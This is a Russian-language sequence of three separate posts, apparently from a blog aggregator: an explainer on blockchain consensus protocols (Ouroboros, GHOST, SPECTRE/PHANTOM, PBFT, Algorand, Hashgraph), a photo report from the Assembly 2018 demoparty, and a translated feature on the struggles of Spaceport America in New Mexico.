В учетных системах на базе PoS предполагается, что пользователям, которые владеют большим количеством монет, невыгодно делать атаки. Если в учетных системах на базе PoW системе предприниматель вкладывает деньги в оборудование и оплачивает электроэнергию, а потом совершает успешную атаку на систему, то он будет терять свои инвестиции в майнинг. В PoS применяется другой подход: если предполагается, что злоумышленник инвестировал в конкретные монеты, в ценности которых он заинтересован, то в случае успешной атаки на систему он потеряет свои вложения, поскольку произойдет обесценивание монет. Поэтому наиболее выгодной стратегией принято считать честное следование протоколу.
Краткий глоссарий
Safety – способность учетной системы сохранять основные принципы функционирования и интересы честных участников при любых злоумышленных воздействиях.
Finality – свойство, которое указывает на неотменяемость принятого решения или подтвержденных данных.
Liveness – свойство, которое гарантирует, что если все честные участники хотят добавить запись в общую базу данных, то в итоге она будет туда добавлена.
Persistence – способность учетной системы сохранять неизменность конечного состояния своей базы данных даже после того, как все ее валидаторы отказали.
Permissioned – указывает на ограничение, то есть необходимость получить разрешение на участие в некотором процессе.
Permissionless – означает свободный доступ к принятию участия в некотором процессе.
Протокол достижения консенсуса Ouroboros
Ouroboros – это протокол на базе PoS, который обеспечивает достижение консенсуса между валидаторами транзакций цифровой валюты Cardano. Причем сам алгоритм является первым доказуемо стойким среди всех PoS-альтернатив.
Сначала рассмотрим более простой вариант, ориентированный на static stake, когда предполагается, что существующее распределение монет не меняется.
Есть некоторый genesis block и пользователи формируют новые транзакции, но они не влияют существенным образом на распределение.
Genesis block содержит в себе данные с некоторым случайным значением, с помощью которого происходит выбор валидаторов. Они позволяют выпускать блок в определенный момент времени. Валидатор, получивший такое право, собирает транзакции, получая их от другого валидатора, проверяет корректность и выпускает блок в сеть. Если он видит несколько цепочек, то он выбирает самую длинную из них и присоединяет блок к ней.
В контексте ситуации, связанной со static stake, мы можем использовать такой подход на протяжении определенного периода времени, но потом распределение доли (stake distribution) между различными пользователями может поменяться. Иначе говоря, часть денег переходит от одних пользователей к другим, и нужно скорректировать вероятность получения права выбора блока.
Примечание: static stake подразумевает, что некоторый промежуток времени stake валидатора считается неизменным. Валидатор может в это время участвовать в принятии решения и совершать платежи, но количество монет в его stake, а следовательно, и вес его голоса останутся неизменными до следующего периода времени.
В случае dynamic stake время делится на слоты, а слоты делятся на эпохи. Продолжительность одной эпохи приблизительно приравнивается к продолжительности одного дня. Это соотношение определено из того, что в течение этого промежутка времени распределение монет не может существенно измениться.
По завершении эпохи фиксируется текущее распределение монет у каждого из пользователей. Кроме того, генерируется новое значение случайности, чтобы гарантировать, что в следующей эпохе пользователи, получающие право генерировать блоки, будут действительно выбраны случайным образом в соответствии с количеством имеющихся у них монет.
Подобным образом происходит защита от так называемых grinding-атак, когда конкретный пользователь может перебрать различные варианты блоков, различные варианты случайности, чтобы сформировать ту цепочку, в которой он может максимизировать свою прибыль. К таким атакам потенциально уязвимы криптовалюты, основанные на PoS-протоколах первого поколения, таких как Peercoin и NXT.
Создатели данного алгоритма решили вышеперечисленные проблемы. Валидаторы запускают между собой специальный протокол, который называется MPC (multi-party computation) и дает возможность сгенерировать случайность совместно. Этот протокол также является доказуемо стойким, он основан на уже давно известных подходах.
Протокол Ouroboros обеспечивает стойкость при условии большинства честных валидаторов в системе. Если честные участники, которые работают над выпуском блоков, контролируют больше 50% монет в системе, протокол можно считать защищенным.
Разработан механизм стимулов (мотивации) к честному поведению. С помощью теории игр доказано, что максимальную выгоду валидатор получает, когда следует правилам протокола. Любое участие в совершении атак не только не увеличивает прибыль участника, но в ряде случаев может и уменьшить ее. Поэтому наиболее выгодная стратегия для валидатора – это честно следовать правилам протокола.
Пропускная способность учетной системы будет ограничена только задержками при синхронизации сети. Данный протокол обеспечивает высокую энергоэффективность по сравнению с proof-of-work, поскольку здесь не нужны майнинговые фермы. Сейчас для сбора транзакций и выпуска блоков достаточно обычного персонального компьютера. В перспективе эти вычисления можно будет осуществлять даже на обычном смартфоне.
К ограничениям протокола Ouroboros можно отнести тот факт, что первая версия протокола является синхронной. Это значит, что сообщения между участниками должны доставляться в ограниченный промежуток времени. Если в сети будут появляться более длительные задержки, чем заложены в правилах, это может снизить безопасность. Тем не менее уже запланировано использование следующей версии протокола – Ouroboros Praos. В ней даже при увеличении задержек в сети гарантируется полная безопасность.
Проблемы с PoW в Биткоине
Рассмотрим способ достижения консенсуса, который лежит в основе Bitcoin. Часть блоков, которые генерируются честными пользователями все равно отбрасывается – это так называемые orphan blocks. Эти блоки сгенерированы параллельно с основной цепочкой, но большая часть сети решила, что эту цепочку не стоит продолжать, и блоки отбрасываются.
Когда таких блоков мало, в этом нет ничего страшного. Однако если их много, сеть не успевает синхронизироваться и получается, что часть вычислительных мощностей честных пользователей сети теряется впустую. Это значит, что теперь злоумышленнику необходимо бороться не за 51% вычислительной мощности сети, а фактически за меньший процент. Если это значение 20%, то злоумышленник с 20% вычислительной мощности и большой задержкой доставки сообщений сети может реализовать double-spending атаку.
Поэтому в Биткоине установлен промежуток времени между добытыми блоками длительностью 10 минут. Благодаря этому сеть успевает четко синхронизироваться и вероятность появления таких блоков снижается. Если потребуется увеличить пропускную способность сети через увеличение частоты формирования блоков, то понадобится другое решение.
GHOST
Первым таким решением был PoW-протокол GHOST. Его упрощенная версия используется в платформе Ethereum.
В этом случае злоумышленник может тянуть свою цепочку (обозначенную на рисунке красным цветом) и сделать ее самой длинной, но она не будет выигрышной. Честные пользователи будут следовать той цепочке, которую они строили до этого.
У честных пользователей в этом случае может быть две цепочки. Самая длинная (1B-2D-3F-4C-5B), но она будет короче, чем цепочка злоумышленника. Особенность GHOST в том, что алгоритм ориентируется не на самую длинную цепочку, а на количество блоков в дереве, образуемом текущей цепочкой. Учитывается не только длина самой цепочки, но и блоки на разных ее высотах. Таким образом, получается не линейная цепочка, а дерево. Учитывается количество блоков, которое в нем находится.
Если посмотреть на цепочку 1B-2C-3D-4B, то видны сопровождающие блоки 3E и 3C. По количеству блоков и затраченной работы эта цепочка обладает наибольшей сложностью и именно она будет принята за основную. Честные пользователи продолжат считать ее основной, несмотря на попытки злоумышленника атаковать сеть. В традиционном консенсусе Nakamoto такая атака была бы успешной, но для GHOST она не представляет угрозы.
Тем не менее недостатком GHOST остается тот факт, что часть блоков по-прежнему теряется. В данном случае цепочка 2D-3F-4C-5B все равно будет отброшена. Следовательно, вопрос отбрасывания блоков честных пользователей остается открытым.
SPECTRE и PHANTOM
C целью увеличения частоты формирования блоков и решения проблемы с отбрасыванием блоков честных пользователей было предложено еще два PoW-протокола: SPECTRE и PHANTOM.
Они используют уже даже не древовидную структуру, а так называемый направленный ациклический граф (directed acyclic graph, DAG). В этом случае валидатор включает в заголовок своего блока указатели на блоки, на которые еще не ссылаются другие валидаторы, по крайней мере в том состоянии сети, которое он видит на текущий момент времени, и отправляет блок дальше.
Поэтому получается такая структура, в которую включаются вообще все блоки, которые видят валидаторы на текущий момент времени. Здесь майнинговые мощности честных пользователей вообще не теряются. Более того, обеспечивается высокая пропускная способность сети и высокий уровень безопасности. Преимуществом такого подхода является тот факт, что система по-настоящему децентрализована.
Давайте сравним особенности сети Биткоин и сети, которая работает с помощью протоколов SPECTRE и PHANTOM. Если говорить о текущем положении в сети Биткоин, то большое значение стоит придавать майнинговым пулам. В современном Биткоине за сутки выходит 144 блока. Именно такая цифра получается, если количество минут в сутках поделить на 10. Вполне реальной может быть ситуация, когда валидатор купил оборудование, долгое время оплачивал электроэнергию, но сгенерировать блок у него так и не получилось, а за это время оборудование устарело и использовать его больше нет смысла. Чтобы избежать этой ситуации предприимчивые валидаторы объединяются в майнинговые пулы. В большинстве майнинговых пулов есть ведущий (компания/организация), что склоняет современный Биткоин к централизации процесса валидации новых транзакций.
В случае со SPECTRE и PHANTOM майнинговые пулы вообще не нужны. Если мы проведем параллель с современной сетью Биткоина, то каждый пользователь сети, которая использует протоколы SPECTRE и PHANTOM, имеет шанс выпустить один блок в сутки. Таким образом, в майнинговых пулах потребность вообще отпадает и мы приходим к действительно децентрализованной сети.
Итак, протоколы SPECTRE и PHANTOM обеспечивают высокий уровень децентрализации и высокую пропускную способность сети, но требуется хранить большой объем информации.
BFT-протоколы
Следующий тип протоколов, которые применяются – это BFT-протоколы (Byzantine Fault Tolerance).
Название имеет происхождение из шуточного описания проблемы, которое было сделано в 80-х годах XX столетия при разработке протокола для высоконадежных систем. Был приведен пример про византийских генералов, которые организовывают атаку на какой-то город. Задача генералов заключалась в том, чтобы прийти к единому решению. Но нужно было учесть, что среди них есть несколько предателей. Предатели могли вести себя произвольным образом и, более того, они могли влиять на передачу сообщений между честными генералами, для которых важно или одновременно атаковать город, или одновременно отступить. Если какой-то из честных генералов отступит, то противник победит армию по частям. Поэтому им необходимо было прийти к согласованному решению. Постановка задачи таким образом была сделана в работе, откуда и пошло такое название алгоритма достижения консенсуса.
Для BFT-протоколов предполагается взаимодействие равноправных узлов сети. Предполагается, что есть определенное количество злоумышленников, которые могут действовать скоординированно. Они неизвестны честным участникам. В сети возможны сбои и задержки, то есть часть сообщений может пропадать, а часть может приходить с большой задержкой. Однако накладывается ограничение на количество шагов, в течение которого все честные валидаторы должны прийти к общему решению. В примере задачи есть два варианта: атаковать или отступить.
Допускается, что честные узлы составляют более ⅔ участников. BFT-протоколы гарантированно приходят к общему решению, которое в будущем не может быть отменено. Для не BFT-протоколов вероятность отмены решения является экспоненциально убывающей, но не нулевой.
В основе Биткоина и других современных широко распространенных криптовалют лежат не BFT-протоколы. Для Биткоина есть ненулевая вероятность, которая ничтожно мала, что есть альтернативная цепочка, тянущаяся, например, еще с предыдущего месяца, года или даже с Genesis блока. Вероятность отмены текущей цепочки экспоненциально убывающая, но она существует. В случае BFT-протокола принятое решение не может быть отменено.
Примеры BFT-протоколов
Practical BFT
Первый протокол, который был применен на практике, назывался Practical BFT. Он был предложен в 1999 году. У него достаточно простое функционирование. Клиент обращается к серверу, которого выбирает лидером. Лидер передает эти сообщения другим серверам. После этого сервера сообщают друг другу о том, что пришли определенные сообщения и их необходимо внести в совместную базу данных. Каждый из валидаторов должен подтвердить, что он получил подтверждение от ⅔ других участников.
Когда валидатор получил подтверждение от ⅔ других участников о включении сообщения в свою копию базы данных, то оно вносится в локальную копию данного валидатора.
Протокол является энергоэффективным, обеспечивает высокую пропускную способность и быстрое подтверждение транзакций, но, к сожалению, работает для малого количества валидаторов. Если на базе данного протокола проектировать кластер, файловую систему или облако, то это работает эффективно, но если мы начинаем использовать большое количество узлов, то получаем стремительный рост количества сообщений и очень большой рост нагрузки на сеть. В последнем случае протокол работает неэффективно, особенно, когда сеть работает с задержками, пропускает сообщения и т. д.
Кроме того, в базовом варианте предполагается наличие лидера, что может стать точкой DoS-атаки для остановки работы учетной системы злоумышленником.
HoneyBadger BFT
HoneyBadger BFT хорошо зарекомендовал себя и был разработан как усовершенствованная версия одного из существующих алгоритмов. Он использует ряд особенностей, в том числе криптографическую защиту всех сообщений, которые передаются по сети. Транзакции дешифруются только после достижения определенного соглашения по ним. HoneyBadger состоит из двух протоколов: RBC (Reliable broadcast) и BA (Byzantine Agreement).
С помощью RBC-протокола сообщения доставляются по сети. Этот протокол завершает свою работу только после того, как получит подтверждение, что как минимум ⅔ честных валидаторов получили необходимый набор сообщений. После этого валидаторы переходят к BA-протоколу и согласованию самих транзакций, которые далее направляются в сеть.
Данный протокол обеспечивает надежную криптографическую защиту. Он хорошо работает в сетях с плохим качеством передачи данных, где есть пропуски передаваемых сообщений и задержки в их доставке, а также в сетях с серьезным злонамеренным вмешательством в работу. Здесь нет лидера. Протокол страдает при попытках значительного масштабирования: при сотнях узлов-валидаторов он еще работает нормально, но при нескольких тысячах уже оказывает слишком большую нагрузку на сеть и время подтверждения транзакций сильно увеличивается. В условиях полностью децентрализованной сети учетной системы, где работают тысячи валидаторов, протокол становится малоэффективным.
Результатом дальнейшего развития стали протоколы Algorand и Hashgraph.
Algorand
Протокол Algorand был предложен в 2017 году. Он использует тот же BFT-подход, но ориентирован он на то, что среди всех участников случайным образом выбирается некоторый подкомитет, который выполняет подтверждение транзакций. Причем это подтверждение происходит в несколько этапов, на каждом из которых выбирается свой подкомитет.
Протокол гарантирует с высокой вероятностью, близкой к единице, что подкомитет является честным, если более ⅔ участников сети являются честными, то есть каждый из подкомитетов также будет иметь ⅔ честных участника. Здесь нет лидера, поэтому и нет точки для атаки типа «отказ в обслуживании» (DoS-атаки). Этот протокол обеспечивает высокую пропускную способность учетной системы, быстрое подтверждение транзакций, а также защиту от adaptive corruption.
Предполагается, что злоумышленник может выбрать произвольного валидатора и заявить, что именно он работает в его интересах. Злоумышленник может выбирать те узлы, которые будут работать на него (обязательным для корректной работы является условие, что честных участников остается больше ⅔). И даже в таких условиях протокол обеспечивает стойкость.
Поскольку это BFT-протокол, то в любом случае он обеспечивает свойства safety и persistence. А остальные его свойства будут зависеть от задержек в передаче данных по каналам связи.
Если данный протокол работает в проблемной сети, то существует угроза liveness, связанная с тем, что новые транзакции могут не получать подтверждения. Если в сети появляются слишком большие задержки или злоумышленник получает возможность выбрасывать те сообщения, которые ему нужно выбросить для достижение цели, то это никак не скажется на старых (уже подтвержденных) транзакциях. Их он отменить не сможет. Суть в том, что он сможет отклонять именно принятие новых транзакций.
Hashgraph
Протокол Hashgraph является свежим решением с очень хорошими свойствами. Каждый из валидаторов собирает свои транзакции, выбирает произвольным образом другого участника и направляет ему данные о своих транзакциях, а также информацию, которую сообщили ему другие узлы, когда подключались к нему.
Итак, функционирование очень простое: валидатор «слушает», принимает все сообщения, которые приходят к нему, а после этого произвольным образом выбирает другого участника и отправляет ему все транзакции вместе со своими.
Hashgraph гарантирует, что за конечное число шагов, то есть раундов работы протокола, все узлы приходят к единому решению. Протокол работает быстро и хорошо масштабируется. Он требует большего объема трафика, чем Algorand, но в то же время является очень эффективным. Hashgraph обеспечивает свойства safety и liveness, то есть добавление новых транзакций и приход к единому решению. Он работает даже в условиях полностью асинхронной сети, когда сообщения могут быть задержаны на очень большой промежуток времени или вообще выброшены.
Кроме того, в сети отсутствует лидер, что позволяет злоумышленнику выводить из строя те узлы, которые ему окажутся интересными, может заставлять их работать сообразно своим намерениям. Однако пока сохраняется ⅔ честных пользователей, протокол обеспечивает высокий уровень безопасности.
Итоги по BFT
Подведем итоги по BFT-протоколам. Они обеспечивают очень высокую пропускную способность и позволяют валидаторам приходить к согласию по поводу состояния транзакций в течение фиксированного количества шагов. Данные свойства позволяют им успешно применяться в криптовалютах. Протокол обеспечивает надежную работу даже в ненадежных сетях при условии, что более ⅔ валидаторов учетной системы являются честными. Такие протоколы, как Algorand и Hashgraph, поддерживают высокую пропускную способность и в них может работать действительно большое количество валидаторов.
В то же время у них есть очень серьезный недостаток: в текущем состоянии развития протоколы разработаны для так называемых permissioned учетных систем. Иначе говоря, они разработаны без учета стимула для валидаторов честно работать в самой сети. Предполагается, что такие стимулы находятся за пределами работы данного протокола. Не рассматриваются награды за формирование блока, различные стратегии поведения пользователей.
Чтобы развернуть такие протоколы для работы в permissionless учетных системах, исследователям понадобится провести серьезную работу. В этом отношении у них остается широкая область для исследований с точки зрения теории игр и с точки зрения разработки системы вознаграждения для валидаторов и т. д.
Distributed Lab подготовила данную статью, опираясь на материал видеолекции Романа Олейникова.
Часто задаваемые вопросы
– Возможно ли в ближайшее время внедрение кардинально нового протокола консенсуса и есть ли разработки?
Сейчас, действительно, активно ведутся разработки протоколов консенсуса. Некоторые из них мы сегодня обсуждали: Algorand и Hashgraph из BFT-протоколов, а также протокол на основе PoS-консенсуса Ouroboros. В начале 2018 года был представлен протокол PHANTOM. Это новые протоколы с новыми принципами.
– Чем в Ouroboros обеспечивается, что список узлов, имеющих право формировать блок в определенные временные интервалы, одинаковый для всех узлов?
Вопрос связан с grinding-атаками, которые упоминались выше. Ouroboros обеспечивает свойства persistence и liveness: если транзакция попала в определенный момент времени и получила подтверждение, то она уже не может быть отменена или удалена, так как вероятность замены этого блока стремится к нулю. Иначе говоря, разработчики полагают, что транзакция не может пропасть из совместной базы данных, поскольку она доступна любому желающему.
За счет свойства persistence все узлы сети формируют одинаковый набор транзакций в своей локальной копии базы данных. Потенциальные валидаторы отправляют транзакции со своей случайностью, которая поначалу скрыта, а в момент завершения протокола MPC все могут рассчитать результирующую случайность. У всех пользователей есть согласованная история транзакций, благодаря чему все узлы получают одинаковый список фактических валидаторов. Манипулировать случайностью здесь невозможно, потому что протокол MPC обеспечивает свойства, связанные с тем, что ни один из участников не может получить эту случайность до того момента, пока все не внесли ее в блокчейн. Только после этого случайность вскрывается. Даже если кто-то не хочет вскрывать свою случайность, сам протокол гарантирует, что эти данные будут вскрыты. У всех одинаковое видение истории и случайности. Даже если хотя бы один потенциальный валидатор «пробросил» действительно случайное значение в блокчейн (достаточно одного), результирующая случайность будет непредсказуема.
– В какой книге можно почитать про алгоритмы достижения консенсуса, рассмотренные в этой главе?
К сожалению, пока еще таких книг нет. Есть только отдельные научные работы и статьи. Можно посмотреть статьи по PHANTOM, SPECTRE и Ouroboros. Можно посмотреть сайт, на котором эти статьи можно найти по названию.
– Зачем так много блоков выпускать в PHANTOM и SPECTRE, если нет такого большого количества транзакций? Большинство блоков будут пустыми или содержать мало транзакций.
PHANTOM и SPECTRE ориентируются именно на масштабирование. Для Биткоина уже не раз возникали ситуации, когда транзакции с низкой комиссией могли находиться в сети неподтвержденными даже несколько месяцев. PHANTOM и SPECTRE гарантируют, что все транзакции будут включены в блоки и пропускная способность сети будет увеличена. Эти протоколы могут обеспечить десятки тысяч транзакций в секунду, при этом каждая получит подтверждение. Иначе говоря, они могут обеспечить очень низкую стоимость транзакций в самой сети. Если транзакций нет, то можно, действительно, выпускать пустые блоки.
– Как и кем в BFT выбирается сервер-лидер?
Это зависит от конкретного протокола. Если мы говорим о PBFT, то в этом случае конкретный пользователь выбирает себе сервер-лидер, который будет вести его транзакцию. Если мы говорим про Algorand или Hashgraph, там лидера вообще нет.
– Что будет если в PBFT изначальный запрос придет к скомпрометированному узлу?
В этом случае скомпрометированный (или неработающий) узел его может не обработать. Если пользователь случайным образом выбирает узел, к которому он обращается, и мы имеем две трети честных узлов, то в этом случае с высокой вероятностью через несколько попыток его транзакция получит подтверждение.
– Правильно ли утверждать, что Algorand – это нечто вроде DPoS (Delegated Proof-of-stake)
Нет, это не совсем корректно. Delegated Proof-of-stake подразумевает, что пользователи должны выбрать валидатора и делегировать ему право голоса. Здесь узлы выбираются для подтверждения транзакций действительно случайно. Если посмотреть далеко в будущее и рассматривать варианты построения криптовалюты на Algorand, то дальше действительно необходимо будет разрабатывать варианты делегирования, но для работы самого протокола делегирование не нужно.
– Какие из перечисленных протоколов еще не применяются, но считаются перспективными в будущем?
SPECTRE и PHANTOM – действительно перспективные протоколы. А разработчики SPECTRE работают над тем, чтобы запустить новую цифровую валюту.
Демопати в Хельсинки «Assembly 2018», фотоотчёт, день первый
Всё тоже самое, что и в прошлом году, только ещё больше и лучше. Фестиваль компьютерного искусства, не нуждающийся в представлении. Посвящается всем тем, кто очень хотел поехать, но не смог.
Под катом много фотографий
Ещё не дойдя до места мероприятия, уже было на что посмотреть: уличный стрит-арт. В прошлом году такого не было. Все поддворки во круг торгово-выставочного центра, где проводилось мероприятие, было разукрашено вот такими шедеврами.
Но не все графити были такими позитивными и творческими. От куда ни возьмись, натолкнулись мы и вот на такое художество. Без понятия что там твориться в области пропаганды в Финляндии… но графити, и вообще искусство всегда возвышает; художник делиться добром и глубиной восприятия, тонко подмечая и показывая то, что другие не замечают. А эти карикатуры… трудно назвать стрит-артом вообще. Какая то пропаганда. И всё же, для полноты отчёта, решил я показать и вам:
На пати-тлейс ожидалось пустынно. Ведь это первый день мероприятия, когда все только тащат компы. Я уже представлял увидеть кучу школьников, выгружающий из троллейбуса свои монстры-машины и герлянды неона. А ннет, придя под вечер, мы увидели уже полный укомплектованный зал. Непривычно даже. Ещё начать не успели, а уже все на местах, всё организовано, всё расставлено, всё развешано… эх…
В этом году — зона перед big screen особенно огромная. Очень много мест для зрителей, которые купили лишь входной билет и пришли не играть, а смотреть демки. Мест реально очень много:
Среди стендов и творческих уголков, особо выдающимся в этом году является уголок Финской армии. Они пригнали сюда свой водоплавающий БТР.
Кроме разнообразных тетрисов и олд-скул ЭВМ-ов (фото будут в следующем отчёте), были и разнообразные настолки. В том числе и такой вот знакомый советскому человеку настольный хокей. Я обыграл в него какого-то фина… когда дошли до счёта 3:0, я понял, что пора бы начать поддаваться. Неудобно всё таки у хозяев поля выигрывать… но фин капитулировал, сдался и убежал. Я пожал ему руку и поблагодарил за игру.
Ну и вот таким вот роботом меха-войном закончим сегодняшний отчёт. Ждите следующих выпусков. Завтра пойдут первые демки.
пятница, 3 августа 2018 г.
[Перевод] Плохая ставка, или Космопорт «Америка» как попытка Нью-Мексико вложиться в освоение космоса
Источник: Nigel Young / Foster and Partners
Космопорт «Америка» задумывался как способ пригласить в южные пустыни Нью-Мексико бурно развивающуюся космическую индустрию — теперь, к сожалению, это не «спокойная бухта» на дороге в космос, а лишь футуристический аттракцион для туристов.
Через некоторое время после отъезда из маленького курортного городка Трут-ор-Консекуэнсес, Нью Мексико, в экскурсионном автобусе оживают мониторы. На экране ночь и мерцающие звёзды, из динамиков тихонько играет флейта, а затем негромкий голос начинает повествование: «Всё, что вы видите вокруг, когда-то было морским дном». Конкистадоры называли эту пустыню Jornada del Muerto, «Путь мертвеца». Пока мы неспешно катимся по дороге, рассказчик развлекает туристов историями о небесных загадках.
Это дорога на космодром «Америка», дерзко названного «первым специально построенным коммерческим космопортом». И, если верить рекламным роликам в автобусе, это не просто спящий индустриальный парк, воздвигнутый ради невнятных обещаний «экономического процветания», а чуть ли последняя остановка перед стартом для каждого, кого гложет неутолимое желание достичь звёзд.
Комплекс лежит двадцатью милями юго-западней Трут-ор-Консекуэнсес и пятьюдесятью милями севернее Лас-Крусеса, и трудно отделаться от ощущения, что здесь всё на ближайшие годы застыло в бесконечном и неопределённом «сегодня». Несмотря на то, что лётной годности космодром достиг ещё в 2010 году, широко разрекламированные суборбитальные рейсы компании Virgin Galactic, одного из основных арендаторов, так до сих пор и не начались. Да, мы можем видеть, что во многих регионах мира частная космонавтика сейчас «на переломе», но эта волна изменений никак не докатится до вложившихся в «будущее» городков Нью-Мексико. Разумеется, не так много мест на планете, где такая инициатива, особенно с заявкой на предоставление международных услуг, выглядит правдоподобно. Но если учесть крупные и достаточно неоднозначные инвестиции, вложенные сюда государством, итог, будь то успех или провал, в любом случае серьёзно повлияет на всю мировую частную космонавтику в целом.
Появление «Америки» пока что не более чем очередное событие в многолетней и славной истории военных и аэрокосмических исследований, проводившихся в этом юго-западном уголке. Наш видеогид быстро проскакивает испанскую колонизацию и расширение страны на восток, чтобы перейти к Манхэттенскому проекту в Лос-Аламосе, на севере штата, и операции «Скрепка», секретной программе по вывозу в США немецких учёных после окончания Второй Мировой Войны, таких, как Вернер фон Браун, генеральный конструктор ракет «Фау-2».
Испытательный полигон Вайт-Сэндс, раскинувшийся на восьми тысячах квадратных километрах в котловине Тулароса, видел многое: и взрыв «Тринити», первой атомной бомбы, и взлёт фон-Брауновских ракет. Космодром примыкает к армейской территории и находится в тщательно охраняемом воздушном пространстве, поэтому тестировать без помех ракетную технику в этих краях несколько попроще.
Теперь, к сожалению, это не «спокойная бухта» на дороге в космос, а лишь футуристический аттракцион для туристов.Другая причина появления площадки именно здесь — деньги. В 2006 году Билл Ричардсон, занимавший тогда пост губернатора Нью-Мексико, подписал партнёрский договор с Virgin Galactic на постройку новой штаб-квартиры компании. Штат заплатил за строительство 220 миллионов долларов из бюджета, причем часть суммы поступила из округов-соседей Донья-Ана (там как раз и расположен Трут-ор-Консекуэнсес) и Сиерра (Лас-Крусес) за счёт повышения налога с валовых доходов. Ожидается, что путём дополнительного налогообложения до 2029 года будет получено в общей сумме 75 миллионов долларов. Взамен местное население ждёт преобразований в экономике, и не без причины — согласно Бюро переписи населения США в округе Сиерра самый низкий медианный доход из тридцати трёх округов в составе Нью-Мексико.
Мэнди Гасс, советник по развитию бизнеса в администрации Лас-Крусеса, полна надежд насчёт потенциального влияния космодрома на судьбу города и его идентичность. «Это просто потрясающе, словно уже находиться в будущем», — говорит она — «Думаю, мы безусловно стали заметней на карте».
В дополнение к «эффекту домино», вызванному релокацией сюда девяноста работников Virgin (вдобавок к тем двадцати одному, что уже перебрались в Лас-Крусес), город с нетерпением ждёт прибытия и других космических компаний.
Взлётно-посадочная полоса космопорта «Америка». Фото: Nigel Young / Foster and Partners
А вот Стивен Грин, мэр Трут-ор-Консекуэнсес, с досадой признаёт, что городок населением в шесть с половиной тысяч человек в основном пока знаменит своими горячими источниками («Hot Springs» — то есть буквально «горячие источники», так город назывался до 1950 года, пока название не было изменено в честь популярного телешоу с загадками; жители обычно называют его «Т-о-К») и явно не находится на пике популярности: «Я прекрасно понимаю, что Лас-Крусес привлекает львиную долю тех, кто добирается в эти места. Мы скорее для тех, кто устал от «ритма большого города». Но и Грин рассчитывает на повышение турпотока после того, как начнутся коммерческие полёты в космос.
Если начнутся. На данный момент это просто футуристический аттракцион для приезжих, а не удобная гавань для космических первопроходцев. От бывшего общественного центра города по субботам дважды в день отправляются туристические автобусы; они едут мимо комиссионных магазинов, трейлерных парков, и держат путь к конструкциям, которые вызывающе торчат неподалёку от гор; при всех своих мягко-округлых очертаниях эти сооружения оставляют странное ощущение основательности и надёжности. По пути мы проезжаем потрясающую дамбу Элефант-Бьют, давшую после двадцатилетнего труда инженеров Бюро по мелиорации возможность вести сельское хозяйство в южной части Нью-Мексико; однако мой знакомый из туристов отмечает, что уровень воды в водохранилище сильно снизился по сравнению с его детскими воспоминаниями.
Архитектура космопорта «Америка» — это монолитные бетонные купола и криволинейные формы цвета мокрой земли, совершенно неприметные и потому не слишком впечатляющие; своего рода «ложная скромность». Его дизайн как будто ссылается на другую известную достопримечательность Юго-Запада, которую часто принимали за «город будущего»: Аркозанти, «лабораторию урбанистики» работы Паоло Солери, в 1970 году обосновавшегося в горах к северу от Финикса. Да, они и впрямь странным образом схожи: вероятно, Солери в своём воображении видел город-утопию посреди пустыни так же легко, как и концепты «аркологии» — самоподдерживающейся «экологической архитектуры», которые автор позже воплощал в прототипы космолётов и проекты гипотетических жилых комплексов для пояса астероидов.
Архитектор Паоло Солери на фоне модели по собственному проекту, представляющей гипотетический вид города-ракетодрома. Фото: Bob Daugherty / Associated Press
Тут не поспоришь, объект действительно весьма похож на ожившие наброски Солери.
Официальные экскурсии проводятся по выходным, поэтому в субботу местный Центр Управления выглядит пустовато. Говорят, что тут по-прежнему ведётся работа, но очевидных признаков деятельности не так много. В офисе, арендуемом Virgin Galactic, скотчем заклеены следы от мебели на ковре, скорее всего с целью расставить её на прежние места. А единственный космический аппарат, который мы увидели — маке SpaceShipTwo, поблёскивающий в углу пустого ангара. Даже космолёт — ненастоящий.
Признаться, само название — «Космопорт «Америка» — звучит слишком напыщенно и театрально. На территории Соединённых Штатов уже есть некоторое количество частных пусковых комплексов, и там нередко побольше активности и постояльцев. Та же Virgin большую часть своих тестов проводит в аэрокосмическом центре Мохаве, Среднеатлантический же региональный космопорт недавно принял у себя компанию Vector, одного из главных конкурентов SpaceX.
Хотя бесспорно, есть и другие, вроде Оклахомского аэрокосмопорта, которые даже больше похожи на города-призраки, чем «Америка». Но Нью-Мексико, выбрав такое название, явно пытается сыграть на чувстве национальной гордости; увы, данное место походит на передовой рубеж частной космонавтики не больше, чем декорации к фантастическому фильму.
Скорее, это некая квинтэссенция сюжета про американские пустоши: «будущее» как «репетиция» нежели как реальность. Тут не поспоришь: многие проекты урбанистов начинаются как «погонять прототипы по пустыне». Тестовая ветка Hyperloop One находится в Неваде, беспилотные автомобили катаются вокруг Темпе, Аризона, да и Билл Гейтс для пилотного проекта беспилотных машин выбрал аризонский Бельмонт; шутки шутками, но привычка рассматривать пустыню в том числе и как полотно для создания утопических шедевров сильна по сей день, от мормонского «штата Дезерет» до Блэк-Рок-Сити на фестивале Burning Man. Хотя, Нью-Мексико в данном случае нам кажется скорее репетицией антиутопии, ведь большая часть научных и оборонных предприятий здесь возникла ради Манхэттенского проекта — полевых испытаний ядерного оружия где-то «посреди ничего», чтобы затем с его помощью стереть мир в порошок, в буквальном смысле.
«Репетиций» в космопорте проходит не слишком много (хотя тут и снимали фантастику — The Space Between Us). Virgin Galactic после катастрофы с гибелью одного пилота и травмой второго в 2014 год отложила собственные планы до решения проблемы, которую Национальный совет по безопасности на транспорте сформулировал как «неспособность продумать и выработать меры предосторожности для сценария, в котором единственная ошибка экипажа приводит к катастрофе». Конечно, успешный полёт в 2018 году несколько восстановил уверенность в том, что космический туризм после стольких лет ожидания уже буквально на пороге. Пока мы ехали в Лас-Крусес, Мэнди Гасс высказывалась на этот счёт со сдержанным оптимизмом: «Без сомнения, многие не поверят, пока не увидят своими глазами. Однако в целом мы воодушевлены и полны надежд».
Суборбитальный космолёт SpaceShipTwo компании Virgin Galactic в ожидании лучших времён. Фото: Nigel Young / Foster and Partners
Несмотря на недостаток внимания со стороны Virgin Galactic, тут всё равно что-то происходит. Конечно, туристической Меккой «Америка» ещё не стала, однако некоторые ростки в виде экскурсионных туров каждую субботу, приносящих небольшой стабильный доход в муниципальную казну, всё же имеются, да и аэрокосмическая индустрия развивается понемногу. Например, Google тестировал здесь SkyBender, собственный проект по организации высокоскоростного интернета через беспилотные аппараты. Также на космодроме любят похвастаться проведением 39 вертикальных и 7 горизонтальных стартов, среди которых запуски, организованные UP Aerospace в сотрудничестве с полигоном Вайт-Сэндс, и отправка урн с прахом в рамках «мемориальных космических полётов» от компании Celestis. А во время одного из туров какой-то пожарный обращает наше внимание на ангар, арендованный Boeing для испытаний нового корабля CST-100 Starliner.
